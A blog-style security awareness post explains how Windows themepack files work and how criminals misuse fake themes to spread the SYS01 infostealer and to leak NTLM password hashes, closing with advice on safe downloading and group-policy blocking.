For many people, the ability to customise their computer work space is a wonderful thing – the ability to change colour schemes, sounds, wallpapers, etc. is something that allows them to express their own personality and individuality though their device.
Windows users have long had the ability to alter these items – I remember spending hours tweaking the settings in Windows 95 to have Simpsons themed sounds, and mouse pointers, or playing around with multiple different screensaver files. Even today, I have a folder of 10,000+ desktop images which I randomise to display on my multi-monitor setup – at the moment, all my monitors show a series of images depicting characters from Neil Gaiman’s “The Sandman” – My favourite graphic novels of all time.
Windows 11 allows users to customise their setup either by manually changing backgrounds, colours and sounds, etc., or by selecting one of the hundreds of pre-made themes.
Selecting one of the themes allows a user to download a file known as a themepack – this is a special windows file that contains a number of instructions used to customise the users workspace.
The themepack will typically contain items such as image files and icons, but will also contain a .theme file which contains the instructions to allow windows to make changes to system variables that result in the updated features.
To install a downloaded themepack, simply double-click the file and windows will do all the necessary work to change your settings. Alternatively, you can access themes via Windows settings.
Themepacks are essentially special archive files, which can be examined by changing the extension from .themepack to .zip
Once the file has been renamed, it can be examined via any of the common archival utilities such a WinRaR or 7zip.
In this example, the themepack file contains a single folder of images, and the .theme file
The images folder holds a number of .jpg files of playful dogs which will be used as the desktop images, whilst the .theme file holds the instructions on what to amend in the Windows settings, and ultimately the Windows registry.
Danger ahead!
Whilst themes downloaded via the official Microsoft store are perfectly safe, themepack files downloaded from other sources may not be.
Recent malware spreading campaigns have targeted social media platforms such as Facebook and X to push various malware such as infostealers under the guise of themepacks.
When users click these tempting adverts, they are redirected to websites which in some cases host auto-downloading zip files containing the malware.
In many cases, these zip files contain self-extracting .dll files, PowerShell scripts, and other executables which install the malware and create persistence mechanisms to ensure the malware stays on the victim system as long as possible.
One of the common malware files installed is called SYS01 – This is an info-stealer designed to grab as much data from a victim machine as possible – most of the data targeted by SYS01 is browser data, such as session cookies, stored passwords, and browsing history. The malware also seeks out crypto-currency wallets on the victim machine.
The malware also heavily targets a users facebook data and attempts to steal information relating to the users profile (name, location, date of birth, etc.) as well as any pages the user may administer, including the number of followers or subscribers – this helps to push the malware to even more people by ensuring those followers see the malware-spreading adverts.
Malicious theme files
In other attacks, the attackers generate legitimate .theme files which contain links to external files which when accessed, will force the victim machine to attempt to authenticate with its windows credentials in an attack known as a pass-the-hash attack.
In the example shown above – when the victim executes the themepack, windows will attempt to connect to the externally shared URL to retrieve the image. In doing so, it will send its NTLM password hash, and login user name.
Criminals can collect these hashfiles and attempt to crack the passwords they contain, or in some cases simply send them on to services inn an attempt to hijack a users session.
Due to the fact that Microsoft is moving away from users logging on with local Windows accounts and towards Microsoft online accounts, attackers can use this approach to more readily access a range of remote services offered by Microsoft, such as email accounts, Azure services, Xbox accounts, or corporate networks remotely.
Stay safe
In the corporate environment, the installation of themes can be blocked with group policies, as can outbound NTLM authentication sessions, but home users typically don’t have these luxuries.
So, as with most things – always ensure the legitimacy of the places where you download things from – where possible, only download files from trusted sources – such as the app store / windows store, etc. and try to avoid following links from social media.
If you do download from external sites, then ensure your device is fully up-to-date with any security updates, patches, etc. and always use an anti-virus product. Criminals will try anything to trick a victim into installing their malicious files.
